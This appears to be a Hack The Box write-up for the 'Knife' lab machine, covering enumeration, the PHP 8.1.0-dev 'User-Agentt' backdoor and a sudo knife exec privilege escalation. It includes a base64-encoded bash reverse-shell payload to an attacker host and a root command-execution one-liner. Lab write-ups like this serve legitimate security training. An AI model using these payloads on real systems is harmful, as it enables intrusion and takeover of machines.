Knife Writeup

10 September 2022 #CTF #HTB #box #easy #linux

Knife info

Enumeration

Hey, let's run an nmap scan yeah?

$ sudo nmap -F -sC -sV -oN enum/initial.nmap 10.10.10.242
[...]
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
|   256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
|_  256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title:  Emergent Medical Idea
|_http-server-header: Apache/2.4.41 (Ubuntu)
[...]

HTTP

The web server is giving us a static page that does nothing.

static web page

The menu at the top is just plain text, no links...

Let's take a look at the response headers with curl:

$ curl -I 10.10.10.242
HTTP/1.1 200 OK
Date: Mon, 29 Aug 2022 09:26:41 GMT
Server: Apache/2.4.41 (Ubuntu)
X-Powered-By: PHP/8.1.0-dev
Content-Type: text/html; charset=UTF-8

-I makes curl perform a HEAD request, only retrieving the headers.

Since we got nothing that sticks out, let's feed the PHP version to searchsploit:

$ searchsploit 'PHP 8.1.0-dev'
[...]
PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution
[...]

Foothold

This version of PHP has a Remote Command Execution backdoor triggered when sending a 'User-Agentt' header that contains the string 'zerodium'.

Knowing this, it becomes trivial to get a shell on the box:

$ echo -n 'bash -i  >& /dev/tcp/10.10.14.10/4242  0>&1' | base64 -w 0
YmFzaCAtaSAgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTAvNDI0MiAgMD4mMQ==
$ curl -H "User-Agentt: zerodiumsystem('echo -n YmFzaCAtaSAgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTAvNDI0MiAgMD4mMQ==|base64 -d|bash');" 10.10.10.242

We encode our payload in base64 to avoid bad characters. Make sure to not have '+' or '/' in your base64 (just add spaces until there are gone). It might not be necessary because it is a header but overall good practice.

Privesc

We have a shell as the 'james' user. A good place to start is to check sudo rules:

james@knife:/$ sudo -l
Matching Defaults entries for james on knife:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife

(Sometimes sudo -l requires a password, sometimes doesn't)

We can run this knife executable as root without password.

Let's try to learn more about this program:

james@knife:/$ ls -l /usr/bin/knife
lrwxrwxrwx 1 root root 31 May  7  2021 /usr/bin/knife -> /opt/chef-workstation/bin/knife

Ok, so it is a symlink. We can search online if this chef-workstation thing actually exists: and it does

Scrolling through the docs, we come across an exec subcommand that can execute arbitrary ruby code:

james@knife:/$ sudo knife exec -E 'system("id")'
uid=0(root) gid=0(root) groups=0(root)

Boom.

Key Takeaways

always check sudo -l for privesc
when there is nothing interesting, check versions